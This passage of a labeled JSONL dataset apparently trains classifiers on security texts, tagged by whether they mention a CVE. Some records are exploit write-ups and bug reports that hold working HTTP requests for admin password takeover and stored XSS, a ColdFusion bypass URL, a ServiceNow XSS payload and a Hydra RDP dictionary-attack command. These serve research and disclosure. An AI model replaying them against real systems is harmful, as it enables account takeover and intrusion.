occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.\n\n# Tested On: Windows 11\n\n### Affected Page:\n> list.php , manage_user.php\n\n> On these page, application isn't verifying the authorization mechanism. Due to that, all the parameters are vulnerable to broken access control and low privilege user could view the list of user's and change any user password to access it.\n\n### Description:\n> Broken access control allows low privilege attacker to change password of all application users\n\n### Proof of Concept:\n> Following steps are involved:\n1. Visit the vulnerable page: ?page=user/list\n2. Click on Action and Edit the password of Admin\n\n![image](https://user-images.githubusercontent.com/123810418/219884701-0f1feb4f-6c8a-4299-b510-1762461910ee.png)\n\n4. Update the Password and Submit\n\n5. Request:\n```\nPOST /adms/classes/Users.php?f=save HTTP/1.1\nHost: localhost\nContent-Length: 877\nsec-ch-ua: \"Chromium\";v=\"109\", \"Not_A Brand\";v=\"99\"\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfODLB5j55MvB5pGU\nX-Requested-With: XMLHttpRequest\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36\nsec-ch-ua-platform: \"Windows\"\nOrigin: http://localhost\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost/adms/admin/?page=user/manage_user&id=1\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5\nConnection: close\n\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"id\"\n\n1\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"firstname\"\n\nAdminstrator\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"middlename\"\n\n\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"lastname\"\n\nAdmin\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"password\"\n\nadmin123\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"type\"\n\n1\n------WebKitFormBoundaryfODLB5j55MvB5pGU\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryfODLB5j55MvB5pGU--\n\n```\n6. Successful exploit screenshots are below (without cookie parameter)\n![image](https://user-images.githubusercontent.com/123810418/219884923-5283fca6-d509-4c48-9db0-f61ea6dbb352.png)\n\n7. Vulnerable Code Snippets:\n\n![image](https://user-images.githubusercontent.com/123810418/219884994-e74d7d48-4d45-4135-9a38-45e26c65434b.png)\n\n![image](https://user-images.githubusercontent.com/123810418/219885023-a76afbe0-88f0-4aaa-89cd-1e541e511427.png)\n\n### Recommendation:\n> Whoe", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "cacf44032b3acfdee83b", "text": "[Improper Access Control - Generic] Adobe ColdFusion Access Control Bypass - CVE-2023-38205\n\n**Description:**\nHi team,\nThe subdomain https://████ is with adobe ColdFusion vulnerable with CVE-2023-38205.\nThis vulnerability is a bypass path created for CVE-2023-29298.\n\n## References\n\nhttps://www.rapid7.com/blog/post/2023/07/19/cve-2023-38205-adobe-coldfusion-access-control-bypass-fixed/\n\n## Impact\n\nIf an attacker accesses a URL path of /hax/..CFIDE/wizards/common/utils.cfc the access control can be bypassed and the expected endpoint can still be reached, even though it is not a valid URL path .\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2023-38205\n\n## Steps to Reproduce\n1. Go to: https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx\n2. See the remote method call wizardHash on the/CFIDE/wizards/common/utils.cfc endpoint.\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-12-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2da00e12a7600ac22793", "text": "most secure login manager\n\nI know that keepassxc was removed from parrot because it was deemed useless I would like the most secure login managent framework available I have seen that keeper plus yubikey bio creates perhaps the perfect solution, however yubikeys are expensive. Is there an open source inexpensive solution, that utilises local USB storage, FIDO2, phone fingerprint or eye scan as part of the solution?", "source": "parrotsec", "timestamp": "2022-09-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ca219f8c95dafca1c48e", "text": "Repositorio pen test\n\nHello everyone can anybody help me which command do i run to install the pen test tools on parrot xfce home", "source": "parrotsec", "timestamp": "2022-01-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "35cfb22fa1e6718ef0d7", "text": "Snyk plugins vulnerable to Command Injection\n\n[Severity: MEDIUM]\n\nThe package snyk before 1.1064.0; the package snyk-mvn-plugin before 2.31.3; the package snyk-gradle-plugin before 3.24.5; the package @snyk/snyk-cocoapods-plugin before 2.5.3; the package snyk-sbt-plugin before 2.16.2; the package snyk-python-plugin before 1.24.2; the package snyk-docker-plugin before 5.6.5; the package @snyk/snyk-hex-plugin before 1.1.6 are vulnerable to Command Injection due to an incomplete fix for [CVE-2022-40764](https://security.snyk.io/vuln/SNYK-JS-SNYK-3037342). A successful exploit allows attackers to run arbitrary commands on the host system where the Snyk CLI is installed by passing in crafted command line flags. In order to exploit this vulnerability, a user would have to execute the snyk test command on untrusted files. In most cases, an attacker positioned to control the command line arguments to the Snyk CLI would already be positioned to execute arbitrary commands. However, this could be abused in specific scenarios, such as continuous integration pipelines, where developers can control the arguments passed to the Snyk CLI to leverage this component as part of a wider attack against an integration/build pipeline. This issue has been addressed in the latest Snyk Docker images available at https://hub.docker.com/r/snyk/snyk as of 2022-11-29. Images downloaded and built prior to that date should be updated. The issue has also been addressed in the Snyk TeamCity CI/CD plugin as of version v20221130.093605.", "source": "github_advisory", "timestamp": "2022-11-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c2a431032c22e28bd244", "text": "CVE: CVE-2022-25319\n\n[{'lang': 'en', 'value': 'An issue was discovered in Cerebrate through 1.4. Endpoints could be open even when not enabled.'}]\n\nFix commit: fix: [security] open endpoints should only be open when enabled\n\n- as reported by Dawid Czarnecki from Zigrin Security", "source": "cvefixes", "timestamp": "2022-02-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ce3109d07c1b7867e4ba", "text": "Stored Cross-site Scripting in Jenkins Mask Passwords Plugin\n\n[Severity: MEDIUM]\n\nJenkins Mask Passwords Plugin 3.0 and earlier does not escape the name and description of Non-Stored Password parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix.", "source": "github_advisory", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0d8f5148fee06cd44500", "text": "Thank you very much, you have helped me to find the flag. I have followed the following steps: 1). I have used the code provided by @XSSDoctor and generated the binary. 2). I have opened the binary with “gdb” and made a breakpoint after the “xor”. The idea is to get the value of the “rdx” register in each of the 14 iterations. The ShellCode is the concatenation of the 14 iterations. 3). You run the ShellCode. I ended up very tired after this", "source": "hackthebox", "timestamp": "2023-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9d2a57e55f1206be9463", "text": "Text me If you want! I will support you! my discord satellite#1213", "source": "hackthebox", "timestamp": "2022-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "dbfaefb2055e422e2f97", "text": "x86 Visual Studio C++ MASM Assembly Bending Sprites Plugin info\n\nHi All, Currently I am attempting to create a bending sprite plugin using x86 Visual Studio C++ MASM Assembly as currently the DarkGDK game engine I am using is good but doesn't support bending sprites. What you can post on this thread: If you have made a bending sprite plugin made in x86 assembly share the info or ideas you have on this thread. Also if you have any ideas of the best way to reverse engineer a C++ DLL you can share that info as well as I am currently trying to reverse engineer an game AI Engine DLL.", "source": "go4expert", "timestamp": "2023-04-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "401d3b1c0816293f73a8", "text": "Hey, I have been stuck in getting the second flag. Any hints are appreciated!", "source": "hackthebox", "timestamp": "2023-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f88ff59c15382991ec33", "text": "give and take that android is Linux or a form of it , rooting from Linux should be a better experienced , and due to mostly everything involving a tool to download on windows you have to pay for , i myself wouldn’t mind devlo[ping software for this purpose , hence myself asking", "source": "parrotsec", "timestamp": "2023-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4c4d3f1918c070f73779", "text": "Thanks, that helped a lot!! Also, in this case, you have to use -u with hydra in order to try alle usernames per password instead of first trying all passwords with one username (hope I formulated it clearly …) … this will significantly speed up the process.", "source": "hackthebox", "timestamp": "2023-06-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c51298199bb723171997", "text": "CVE: CVE-2022-24751\n\n[{'lang': 'en', 'value': 'Zulip is an open source group chat application. Starting with version 4.0 and prior to version 4.11, Zulip is vulnerable to a race condition during account deactivation, where a simultaneous access by the user being deactivated may, in rare cases, allow continued access by the deactivated user. A patch is available in version 4.11 on the 4.x branch and version 5.0-rc1 on the 5.x branch. Upgrading to a fixed version will, as a side effect, deactivate any cached sessions that may have been leaked through this bug. There are currently no known workarounds.'}]\n\nFix commit: CVE-2022-24751: Clear sessions outside of the transaction.\n\nClearing the sessions inside the transaction makes Zulip vulnerable to\na narrow window where the deleted session has not yet been committed,\nbut has been removed from the memcached cache. During this window, a\nrequest with the session-id which has just been deleted can\nsuccessfully re-fill the memcached cache, as the in-database delete is\nnot yet committed, and thus not yet visible. After the delete\ntransaction commits, the cache will be left with a cached session,\nwhich allows further site access until it expires (after\nSESSION_COOKIE_AGE seconds), is ejected from the cache due to memory\npressure, or the server is upgraded.\n\nMove the session deletion outside of the transaction.\n\nBecause the testsuite runs inside of a transaction, it is impossible\nto test this is CI; the testsuite uses the non-caching\n`django.contrib.sessions.backends.db` backend, regardless. The test\nadded in this commit thus does not fail before this commit; it is\nmerely a base expression that the session should be deleted somehow,\nand does not exercise the assert added in the previous commit.", "source": "cvefixes", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "20eabdf509af91596700", "text": "Rixker0-Sarkar0: The parrot archive url of “open books” has changed currently its on, Hello. Check it again: https://archive.parrotsec.org/parrot/misc/misc/openbooks/", "source": "parrotsec", "timestamp": "2022-01-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d840c13883f22a5a4674", "text": "Hi, Did you try Behindflare? https://pkg.go.dev/github.com/alebeta90/behindflare#section-readme GitHub GitHub - alebeta90/behindflare: This tool was created as a Proof of Concept ... This tool was created as a Proof of Concept to reveal the threats related to web service misconfiguration using CloudFlare as reverse proxy and WAF - GitHub - alebeta90/behindflare: This tool was ... Or Shodan maybe? Shodan Shodan Search engine of Internet-connected devices. Create a free account to get started.", "source": "hackersploit", "timestamp": "2022-03-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "44ee9b4643ef7e9f0236", "text": "Proxychains can’t run on another proxies except for the localhost\n\nHey I tried to use proxychains and it work on socks4/5 127.0.0.1 9050 but it is always showing need more proxies when i use any proxy addresses except for the 127.0.0.1 proxy. So do you guys knows how to fixed it?", "source": "parrotsec", "timestamp": "2022-02-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bb20940384c531be00c7", "text": "CVE: CVE-2022-27311\n\n[{'lang': 'en', 'value': 'Gibbon v3.4.4 and below allows attackers to execute a Server-Side Request Forgery (SSRF) via a crafted URL.'}]\n\nFix commit: Ensure we raise if the root domain changed and it was not an expected behavior", "source": "cvefixes", "timestamp": "2022-04-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c5006b0db4f277240efd", "text": "[Cross-site Scripting (XSS) - Reflected] XSS in ServiceNow logout https://████:443\n\n**Description:**\nXSS in ServiceNow logout \nhttps://██████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n## References\nhttps://nvd.nist.gov/vuln/detail/CVE-2022-38463\n\n## Impact\n\nUnauthenticated remote attacker can execute code in user's browser context. User must click on malicious link\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\nServicenow prior to SanDiego SP6\n\n## CVE Numbers\nCVE-2022-38463\n\n## Steps to Reproduce\nClick on https://█████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n\n## Suggested Mitigation/Remediation Actions\nUpgrade to patched version of ServiceNow", "source": "hackerone", "timestamp": "2023-05-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "90ee38db0400d058278a", "text": "Denial of Service (DoS) in Nokogiri on JRuby\n\n[Severity: HIGH]\n\n## Summary\n\nNokogiri `v1.13.4` updates the vendored `org.cyberneko.html` library to `1.9.22.noko2` which addresses [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv). That CVE is rated 7.5 (High Severity).\n\nSee [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) for more information.\n\nPlease note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.\n\n\n## Mitigation\n\nUpgrade to Nokogiri `>= 1.13.4`.\n\n\n## Impact\n\n### [CVE-2022-24839](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv) in nekohtml\n\n- **Severity**: High 7.5\n- **Type**: [CWE-400](https://cwe.mitre.org/data/definitions/400.html) Uncontrolled Resource Consumption\n- **Description**: The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup.\n- **See also**: [GHSA-9849-p7jc-9rmv](https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv)\n", "source": "github_advisory", "timestamp": "2022-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a20bd34d984ee52068cc", "text": "CVE: CVE-2022-1997\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository francoisjacquet/rosariosis prior to 9.0.'}]\n\nFix commit: Fix stored XSS security issue: remove inline JS from URL in PreparePHP_SELF.fnc.php", "source": "cvefixes", "timestamp": "2022-06-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "999d106baf73792a5e29", "text": "Working with Web Services, linux fundamentals\n\nhello i am unsure about question “Find a way to start a simple HTTP server inside Pwnbox or your local VM using “npm”. Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).” i tried … npm install -g http-server; server-http -p 8080 i get a response ideal tree lib", "source": "hackthebox", "timestamp": "2022-09-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8f7647530e602b8c5cf8", "text": "CVE: CVE-2022-0318\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4151: reading beyond the end of a line\n\nProblem: Reading beyond the end of a line.\nSolution: For block insert only use the offset for correcting the length.", "source": "cvefixes", "timestamp": "2022-01-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "498652b4ce3977126050", "text": "Dictionary Password Cracking (A THC Hydra starter guide)\n\nHello! In this tutorial, we will explore how to run a dictionary attack of THC Hydra. Let’s get started. If you are running Kali Linux you will already have a version of Hydra installed. If not you can install it on Linux platforms using the command sudo apt-get install hydra or just download it from the Github Repository https://github.com/vanhauser-thc/thc-hydra . Once you have finished the installation you have a new application called THC-Hydra. It should look like this: image 523×616 46.3 KB THC Hydra has the option of running a dictionary attack or a brute force attack, however, in this tutorial, we will focus on the Dictionary Attack option. In the THC Hydra folder, you can import wordlists for dictionary attacks. I am getting mine from skullsecurity.org . In this, I am using the Rockyou.txt wordlist. To start the cracking, you would input command like this. hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://Add IP ADRESS HERE . If you did everything correctly it should look like this: image 945×597 155 KB Congratulations! You were able to run a dictionary attack using THC Hydra. I hope this helps you. C_J", "source": "hackersploit", "timestamp": "2022-08-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f56816d6865c22823734", "text": "LOL thank you so much … ■■■■! I think that HTB should have made that more clear … unless I overlooked something, I don’t think there is a very clear cut order to use the Wireshark-lab-2.zip", "source": "hackthebox", "timestamp": "2022-03-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "57e29c71febe8d509ad7", "text": "Did you end up getting it? Took me a while to see why it wasn’t working through the debugger. I get it now. This info really helped break looks the cobwebs in my head: Skills Assessment - 32 bit buffer overflow HTB ACADEMY Tools You can only debug a setuid or setgid program if the debugger is running as root. The kernel won't let you call ptrace on a program running with extra privileges. If it did, you would be able to make the program execute anything, which would effectively mean you could e.g. run a root shell by calling a debugger on /bin/su. So you might need to think of another way to get the shellcode triggered outside GDB", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "290a93554ab39d2c97cd", "text": "Sales Tracker Management System v1.0 - Multiple Vulnerabilities\n\nExploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities\nGoogle Dork: NA\nDate: 09-06-2023\nEXPLOIT-AUTHOR: AFFAN AHMED\nVendor Homepage: \nSoftware Link: \nVersion: 1.0\nTested on: Windows 11 + XAMPP\nCVE : CVE-2023-3184\n\n==============================\nCREDENTIAL TO USE\n==============================\nADMIN-ACCOUNT\nUSERNAME: admin\nPASSWORD: admin123\n\n=============================\nPAYLOAD_USED\n=============================\n1. CLICK_HERE_FOR_FIRSTNAME\n2. CLICK_HERE_FOR_MIDDLENAME\n3. CLICK_HERE_FOR_LASTNAME\n4. CLICK_HERE_FOR_USERNAME\n\n\n===============================\nSTEPS_TO_REPRODUCE\n===============================\n1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN\n2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user`\n3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename` `lastname` and in `username`\n4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON\n5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER IS ADDED .\n6. AFTER CLICKING ON THE EACH PAYLOAD IT REDIRECT ME TO EVIL SITE\n\n\n\n==========================================\nBURPSUITE_REQUEST\n==========================================\nPOST /php-sts/classes/Users.php?f=save HTTP/1.1\nHost: localhost\nContent-Length: 1037\nsec-ch-ua:\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo\nX-Requested-With: XMLHttpRequest\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36\nsec-ch-ua-platform: \"\"\nOrigin: http://localhost\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost/php-sts/admin/?page=user/manage_user\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn\nConnection: close\n\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"id\"\n\n\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"firstname\"\n\nCLICK_HERE_FOR_FIRSTNAME\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"middlename\"\n\nCLICK_HERE_FOR_MIDDLENAME\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"lastname\"\n\nCLICK_HERE_FOR_LASTNAME\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"username\"\n\nCLICK_HERE_FOR_USERNAME\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"password\"\n\n1234\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"type\"\n\n2\n------WebKitFormBoundary7hwjNQW3mptDFOwo\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundary7hwjNQW3mptDFOwo--\n\n===============================\nPROOF_OF_CONCEPT\n===============================\nGITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md", "source": "exploitdb", "timestamp": "2023-06-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "21d2c419107bc0c0a0a0", "text": "Just Started Using Parrot, Any Guidance Or Roadmap To Ethical Hacking?\n\nHow should a beginner like me learn ethical hacking with parrot os", "source": "parrotsec", "timestamp": "2023-03-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f50c3c0d05f0026428ba", "text": "Given the question in that section of the module, I’ve tried: 1.) Running the program as is 2.) Checking the ebp register. 3.) Inputting the address as the answer 4.) Answer is incorrect Since this did not work, I thought maybe it’s referring to the address of ebp at main. I tried: 1.) Setting a breakpoint at main 2.) Running program 3.) Inputting the address of ebp at that breakpoint 4.) Answer is incorrect At this point, I’m pretty confused. Going over my notes again. Reading through that section again. I saw this thread on the forum and decided to do the following: 1.) Create the string using the python tool provided in the section 2.) Inputing the command provided in the section example, using the string. 3.) Running the program 4.) Checking register ebp and submitting the address as the answer 5.) Answer is incorrect I know I’m doing something wrong here. I’m out of ideas. Any hints? *Edit. I’ve also tried reversing the order of bytes from the address due to little endianness, still not the correct answer.", "source": "hackthebox", "timestamp": "2022-11-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c386738bed69a8cd08ea", "text": "CVE: CVE-2022-31050\n\n[{'lang': 'en', 'value': 'TYPO3 is an open source web content management system. Prior to versions 9.5.34 ELTS, 10.4.29, and 11.5.11, Admin Tool sessions initiated via the TYPO3 backend user interface had not been revoked even if the corresponding user account was degraded to lower permissions or disabled completely. This way, sessions in the admin tool theoretically could have been prolonged without any limit. TYPO3 versions 9.5.34 ELTS, 10.4.29, and 11.5.11 contain a fix for the problem.'}]\n\nFix commit: [SECURITY] Synchronize admin tools session with backend user session\n\nAdmin tools sessions are revoked in case the initiatin backend user\ndoes not have admin or system maintainer privileges anymore. Besides\nthat, revoking backend user interface sessions now also revokes access\nto admin tools. Standalone install tool is not affected.\n\nResolves: #92019\nReleases: main, 11.5, 10.4\nChange-Id: I367098abd632fa34caa59e4e165f5ab1916894c5\nSecurity-Bulletin: TYPO3-CORE-SA-2022-005\nSecurity-References: CVE-2022-31050\nReviewed-on: https://review.typo3.org/c/Packages/TYPO3.CMS/+/74905\nTested-by: Oliver Hader \nReviewed-by: Oliver Hader ", "source": "cvefixes", "timestamp": "2022-06-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "27a36f6992aa0a042e87", "text": "CVE: CVE-2022-23618\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions there is no protection against URL redirection to untrusted sites, in particular some well known parameters (xredirect) can be used to perform url redirections. This problem has been patched in XWiki 12.10.7 and XWiki 13.3RC1. Users are advised to update. There are no known workarounds for this issue.'}]\n\nFix commit: XWIKI-10309: Check URL domains based on a whitelist (#1592)\n\nIntroduce a new property for listing the trusted domains and API to\r\ncheck an URL against that list and the aliases used in subwikis.\r\n\r\n * Add new property url.trustedDomains in xwiki.properties\r\n * Add new API in URLConfiguration to retrieve this configuration value\r\n * Create a new URLSecurityManager responsible to check if an URL can\r\n be trusted based on this property and on the subwikis configurations\r\n * Introduce a new listener to invalidate the cache of\r\n URLSecurityManager whenever a XWikiServerClass xobject is\r\nadded/updated/deleted\r\n * Move URL API implementations to URL default module\r\n * Add a new property url.enableTrustedDomains as a global switch off the\r\n checks on domains to avoid breaking behaviours on existing instances\r\n * Add a constant property in URLSecurityManager to be set in\r\n ExecutionContext to allow temporary switch off the check for\r\nextensions\r\n * Use both those switches in DefaultURLSecurityManager to prevent\r\n performing the check when needed", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3cf53754363db20cd464", "text": "CVE: CVE-2022-29196\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.Conv3DBackpropFilterV2` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code does not validate that the `filter_sizes` argument is a vector. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix failed check in Conv3DBackpropFilterV2.\n\nPassing in a rank-0 `filter_size` causes a check fail and crash,\ncoming from a `filter_size.vec<>()` call. Here we check the size\nfirst.\n\nPiperOrigin-RevId: 445517122", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b003c277850ae2495808", "text": "Help to acces control over Wifi\n\nHI, I am a newbie, and I would like someone to help me, or send some instructions to gain a control over wifi router. I was trying few things, but unsuccessful. Thanks for your reply.", "source": "parrotsec", "timestamp": "2022-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4582bbb1a62c2ed5509b", "text": "CVE: CVE-2022-0848\n\n[{'lang': 'en', 'value': 'OS Command Injection in GitHub repository part-db/part-db prior to 0.5.11.'}]\n\nFix commit: Disallow uploading of potentially unsafe file extensions.", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "925359b67ab07a2fe00d", "text": "[Authentication Bypass by Primary Weakness] CVE-2023-27536: GSS delegation too eager connection re-use\n\n## Summary:\nWhen considering reuse of existing connections different `CURLOPT_GSSAPI_DELEGATION` (libcurl) `--delegation` (curl) option is not taken into consideration. This can lead to reuse of previously established connection when it should no longer be (as more strict or no delegation was requested).\n\n## Steps To Reproduce:\n\n 1. `curl --negotiate -u : --delegation \"always\" https://server/path -: --negotiate -u : --delegation \"none\" https://server/path`\n\n## Remediation\n\n- Safest option is to not reuse connections if different `CURLOPT_GSSAPI_DELEGATION` levels are being used. It **might** also be correct to not reuse connections with \"laxer\" `CURLOPT_GSSAPI_DELEGATION`: \"none\" should only allow reusing \"none\" level, \"policy\" should only allow \"none\" or \"policy\" level, while \"always\" can reuse all connections otherwise deemed appropriate for reuse.\n\n## Impact\n\nExisting connection that was established via more lax delegation will be reused for connection that should not succeed due to more restrictive delegation requested. The practical impact can vary, but I believe it is likely quite low, as it should be quite rare to have connections attempted with mixed delegation policies like this.", "source": "hackerone", "timestamp": "2023-03-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6fc613bacf90d2de0ae0", "text": "CVE: CVE-2022-31145\n\n[{'lang': 'en', 'value': 'FlyteAdmin is the control plane for Flyte responsible for managing entities and administering workflow executions. In versions 1.1.30 and prior, authenticated users using an external identity provider can continue to use Access Tokens and ID Tokens even after they expire. Users who use FlyteAdmin as the OAuth2 Authorization Server are unaffected by this issue. A patch is available on the `master` branch of the repository. As a workaround, rotating signing keys immediately will invalidate all open sessions and force all users to attempt to obtain new tokens. Those who use this workaround should continue to rotate keys until FlyteAdmin has been upgraded and hide FlyteAdmin deployment ingress URL from the internet.'}]\n\nFix commit: Merge pull request from GHSA-qwrj-9hmp-gpxh\n\n* Fix claims verification for access tokens in external IdP setup\n\nSigned-off-by: Haytham Abuelfutuh \n\n* Add another test case for no signature\n\nSigned-off-by: Haytham Abuelfutuh ", "source": "cvefixes", "timestamp": "2022-07-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "af498dd434ed0cddae1f", "text": "I’m stuck on this too. What do you mean by FW rule?", "source": "hackthebox", "timestamp": "2022-12-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8cab6b7c208a99074090", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8367, CVE-2018-8465, CVE-2018-8466.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d55bbbd9b2a1039b6b08", "text": "CVE: CVE-2022-33127\n\n[{'lang': 'en', 'value': 'The function that calls the diff 